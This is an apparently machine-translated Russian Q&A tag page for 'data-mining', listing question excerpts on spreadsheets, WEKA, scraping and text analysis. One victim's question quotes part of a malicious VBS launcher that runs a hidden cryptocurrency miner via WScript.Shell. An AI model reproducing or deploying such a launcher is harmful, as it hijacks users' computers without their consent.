Описание тега data-mining
Интеллектуальный анализ данных - это процесс анализа данных с разных точек зрения и обобщения их в полезную информацию.
1
ответ
Иерархическая структура данных в сводной - пустые строки
У меня есть набор данных со структурой в стиле: Fruit Type Organic Sales Banana 15 Apple Green Apple Organic 20 Apple Red Apple Non-Organic 25 Apple Red Apple Organic 17 Orange California 8 Orange Spain 5 Другими словами, фрукты имеют разные уровни …
25 июн '14 в 13:00
1
ответ
Не удается подключиться к серверу mysql из инструмента WEKA
Мне нужно подключить MySQL сервер из моего инструмента WEKA для анализа некоторых данных. Как я могу сделать это соединение на платформе Linux. Я решил использовать драйвер jdbc для этого, но настройка среды не легка для меня! Как мне это сделать?
03 авг '15 в 20:11
1
ответ
API/ инструмент для добычи неструктурированного текста?
Я хочу создать концептуальную карту из неструктурированного текста. Например Desired input: find "/" -name "*.txt" Desired output: concepts-graph.dot Другими словами, я хочу добыть свои текстовые файлы и создать некое структурированное представление…
12 июн '12 в 02:00
0
ответов
Excel - Как рассчитать истощение по большой базе данных
Я анализирую большую базу данных, в которой мне нужно выяснить, сколько клиентов купили продукт более одного раза, и определить, как долго они "прослужили" как клиенты. Мой набор данных начинается в январе 2014 года и действует до июня 2016 года. Ст…
12 июл '16 в 00:02
1
ответ
Извлечь HTML текстовые файлы в текстовый файл
У меня есть папка с большим количеством HTML-файлов, я хотел бы извлечь только текст, содержащийся в теле этого HTML-файла в текстовый файл, как я могу это сделать?
04 окт '15 в 16:21
2
ответа
Как я могу собрать определенные данные с сайта
Я пытаюсь собрать данные с сайта для исследования. URL-адреса хорошо организованы в формате example.com/x, где x - это возрастающий номер, а все страницы структурированы одинаково. Мне просто нужно взять определенные заголовки и несколько цифр, кото…
12 сен '12 в 15:47
0
ответов
Excel извлечение данных удалить слова из ячеек и заменить в другой ячейке
У меня есть данные в столбце под названием "компания", в котором перечислены 3000 компаний вместе с типом компании - будь то LLC, LP, Corp и т. Д. Формат такой: Microsoft_LLC_LLC. Я хочу удалить часть LLC и поместить ее в другой столбец, который на…
20 янв '17 в 04:38
0
ответов
Мой компьютер заражен вирусом майнинга и выдает ошибку хоста скрипта Windows
Первой ошибкой, которую я получил, была ошибка Windows Script Host, описанная как C:\Windows\xdgaudio.vbs Когда я нашел файл, содержимое было Dim WShell Set WShell = CreateObject("WScript.Shell") WShell.Run "wmipvrse.exe -B --donate-level 1 -r 100 -…
04 окт '17 в 18:08
1
ответ
Ошибки страницы, странное поведение памяти и файлов подкачки - особенно, но не конкретно в R
Я должен сказать с самого начала, что я знаю, что я мог бы, вероятно, сделать с еще большим количеством оперативной памяти, так как в настоящее время я использую RStudio в Windows 10 с установленной 4 ГБ оперативной памяти. И пост не обязательно свя…
14 июн '17 в 14:30
0
ответов
Cannot import CSV file to WEKA
Я получил очень большой набор данных из журнала доступа. Я преобразовал его в CSV-файл, используя Vim. Я хочу использовать "WEKA"(инструмент интеллектуального анализа данных) для анализа этого набора данных. Но когда я пытаюсь открыть этот CSV-файл …
01 сен '13 в 10:31
2
ответа
Как я могу очистить только слова слова с веб-сайта?
Я хочу скачать все текстовое содержание с определенного сайта. Сохраните результаты в MS Word, Excel или Notepad и проверьте, какие слова повторяются чаще всего и сколько раз.
27 апр '15 в 18:01
3
ответа
Как найти и скопировать все строки, начинающиеся с ( "http://www.") На определенном веб-сайте (1000 страниц)?
Я ищу ссылки (не URL-адреса страниц), написанные в объявлениях о работе на определенном веб-сайте. Я хотел бы отсканировать веб-сайт и скопировать все строки, начинающиеся с http или www, на ВСЕХ страницах (около 1000) Я на Windows 7. Я не знаю, как…
17 мар '12 в 09:25
0
ответов
Объяснение алгоритма, разработанного в статье "Суммирование набора временных рядов путем усреднения"
Я не специалист по информатике и не могу понять алгоритм, приведенный в статье " https://www.sciencedirect.com/science/article/pii/S030439751100822X". Может ли кто-нибудь объяснить мне это упрощенно, пошагово? В настоящее время я пытаюсь извлечь хар…
14 фев '19 в 15:40
0
ответов
Копирование данных с веб-страниц
Есть ли способ выбрать данные по столбцам для Excel из финансовой отчетности, которые доступны в Интернете? Пример веб-страницы: https://www.sec.gov/Archives/edgar/data/1633917/000163391719000118/pypl10-qq12019.htm Как можно было бы копировать данны…
21 май '19 в 06:49
1
ответ
Держать процессор на 100% опасно?
Я - майнер биткойнов, и мой компьютер, к сожалению, не поддерживает майнинг gpu (продолжает ломать мои драйверы), поэтому я использую майнинг cpu. Однако опасно ли держать мой процессор на%100? У меня есть Dell Inspiron 3542 с i5-4210U. (От 1,7 до 2…
13 сен '14 в 14:37
3
ответа
Что такое сообщение "PS Мы работаем над небольшим майнером JavaScript...." на blogspot
Я создал блог, чтобы поделиться некоторыми важными вопросами и ответами с моими друзьями. Но когда я открываю ссылку на блог в интернет-браузере, это показывает какое-то ненормальное поведение, например, когда компьютер работает очень медленно. Сним…
26 фев '18 в 00:55
2
ответа
Есть ли способ загрузить значения публичной БД (ASP.NET) на жесткий диск?
Я - исследователь в области социальных наук, и я работаю с данными из различных общедоступных баз данных НПО, правительства и т. Д. Давайте предположим, что у меня нет возможности спросить у администраторов всю базу данных. Однако, если у меня хвати…
09 сен '16 в 10:08
1
ответ
Извлечь весь текст определенного шрифта из документа MS Word?
Я преобразовал документ PDF в формат слова. PDF является выпуском журнала. Мне нужен весь текст с определенным шрифтом и либо 9,5 или 10 баллов. Это содержание статей, на которых я хочу заниматься анализом текста (только частоты слов). Тонны других …
29 ноя '16 в 01:22